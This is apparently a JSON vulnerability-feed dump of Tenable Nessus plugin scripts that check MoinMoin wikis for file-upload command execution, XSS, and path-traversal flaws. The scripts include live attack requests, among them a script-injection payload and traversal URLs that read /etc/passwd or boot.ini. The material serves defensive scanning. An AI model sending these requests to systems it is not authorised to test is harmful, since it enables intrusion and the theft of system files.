crap(data:\"-\", length:30);\n\n # Reporting for successful exploit\n if (vuln)\n {\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote: This file has not been removed by Nessus and will need to be' +\n '\\nmanually deleted (' + get_up_path + ').' 
+\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + exp_request +\n '\\n' + snip +\n '\\n' +\n '\\n' + 'The file uploaded by Nessus executed the command \"'+cmd+ '\"' +\n '\\nwhich produced the following output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n }\n # Reporting for successful upload, but attack would require a server restart\n # in order for plugin to be activated\n else if (vuln2)\n {\n report =\n '\\nNessus was able to upload a file to the remote host, however cannot' +\n '\\nverify the issue exists until the web server has been restarted.' +\n '\\nTo test the issue after restarting your webserver, you can use the' +\n '\\nfollowing URL to verify the exploit :' +\n '\\n' +\n '\\n' + install_url + check_url +\n '\\n' +\n '\\nNote that this file has not been removed by Nessus and will need to' +\n '\\nbe manually deleted (/data/plugin/action/' + script + '*).' +\n '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\nThis file was uploaded using the following request :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + data_protection::sanitize_uid(output:exp_request) +\n '\\n' + snip +\n '\\n';\n }\n }\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The version of MoinMoin running on the remote host is affected by a\ncross-site scripting vulnerability in the 'template' parameter of the\n'PageEditor.py' script. 
An unauthenticated, remote attacker,\nexploiting this flaw, could execute arbitrary script code in a user's\nbrowser.", "edition": 25, "published": "2010-06-07T00:00:00", "title": "MoinMoin PageEditor.py template Parameter XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2487"], "modified": "2010-06-07T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_PAGEEDITOR_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/46817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46817);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-2487\");\n script_bugtraq_id(40549);\n script_xref(name:\"Secunia\", value:\"40043\");\n\n script_name(english:\"MoinMoin PageEditor.py template Parameter XSS\");\n script_summary(english:\"Attempts a non-persistent XSS attack\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A wiki application on the remote web server has a cross-site scripting\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MoinMoin running on the remote host is affected by a\ncross-site scripting vulnerability in the 'template' parameter of the\n'PageEditor.py' script. 
An unauthenticated, remote attacker,\nexploiting this flaw, could execute arbitrary script code in a user's\nbrowser.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patch from the vendor's advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port, exit_on_fail:TRUE);\n\npayload = SCRIPT_NAME + unixtime();\nexploit = '<script>alert(\\'' + payload + '\\')</script>';\n\nexploited = 
test_cgi_xss(\n port:port,\n dirs:make_list(install['dir']),\n cgi:'/'+payload,\n qs:'action=edit&template='+urlencode(str:exploit),\n pass_str:'<div class=\"warning\">[Template '+exploit + ' not found]',\n ctrl_re:'<li>Edit \"' + payload + '\"</li>'\n);\n\nif (!exploited)\n{\n install_url = build_url(qs:install['dir'] + '/', port:port);\n exit(0, \"The MoinMoin install at \" + install_url + \" is not affected.\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-20T12:09:08", "description": "The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.", "edition": 24, "published": "2010-02-02T00:00:00", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": [], "modified": "2010-02-02T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_ARGV_INFO_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/44383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure 
vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n 
script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n 
res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T12:09:09", "description": "The remote host is running MoinMoin, a wiki application written in\nPython.\n\nThe version of MoinMoin installed on the remote host fails to validate\ninput to the 'MOIN_ID' cookie before using it to read and write user\nprofiles. By providing the name of a file that exists on the remote\nhost and is writable by the web server user id, an unauthenticated\nremote attacker may be able to exploit this issue to corrupt files,\npossibly even injecting arbitrary PHP code that could later be\nexecuted subject to the privileges of the web server user id.", "edition": 25, "published": "2008-01-24T00:00:00", "title": "MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File Overwrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0782"], "modified": "2008-01-24T00:00:00", "cpe": ["cpe:/a:moinmo:moinmoin"], "id": "MOINMOIN_COOKIE_ID.NASL", "href": "https://www.tenable.com/plugins/nessus/30055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(30055);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-0782\");\n script_bugtraq_id(27404);\n script_xref(name:\"EDB-ID\", value:\"4957\");\n script_xref(name:\"Secunia\", value:\"29010\");\n\n script_name(english:\"MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File 
Overwrite\");\n script_summary(english:\"Tries to generate an error using an invalid cookie\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Python application that suffers from\nan input sanitation vulnerability.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running MoinMoin, a wiki application written in\nPython.\n\nThe version of MoinMoin installed on the remote host fails to validate\ninput to the 'MOIN_ID' cookie before using it to read and write user\nprofiles. By providing the name of a file that exists on the remote\nhost and is writable by the web server user id, an unauthenticated\nremote attacker may be able to exploit this issue to corrupt files,\npossibly even injecting arbitrary PHP code that could later be\nexecuted subject to the privileges of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the patches referenced in the project's advisory above.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"moinmoin_detect.nasl\");\n 
script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\n# Pass in an invalid cookie.\nset_http_cookie(name: \"MOIN_ID\", value: \".\");\n\nurl = install['dir']+'/';\nr = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(r)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# There's a problem if there's an error related to the cookie.\nif (\n '>IOError<' >< r[2] && '>[Errno 21]' >< r[2] &&\n \"auth_method='moin_cookie'\" >< r[2] && '/MoinMoin/user.py' >< r[2]\n)\n{\n security_hole(port);\n exit(0);\n}\nelse\n{\n full_url = build_url(qs:install['dir'] + '/', port:port);\n exit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}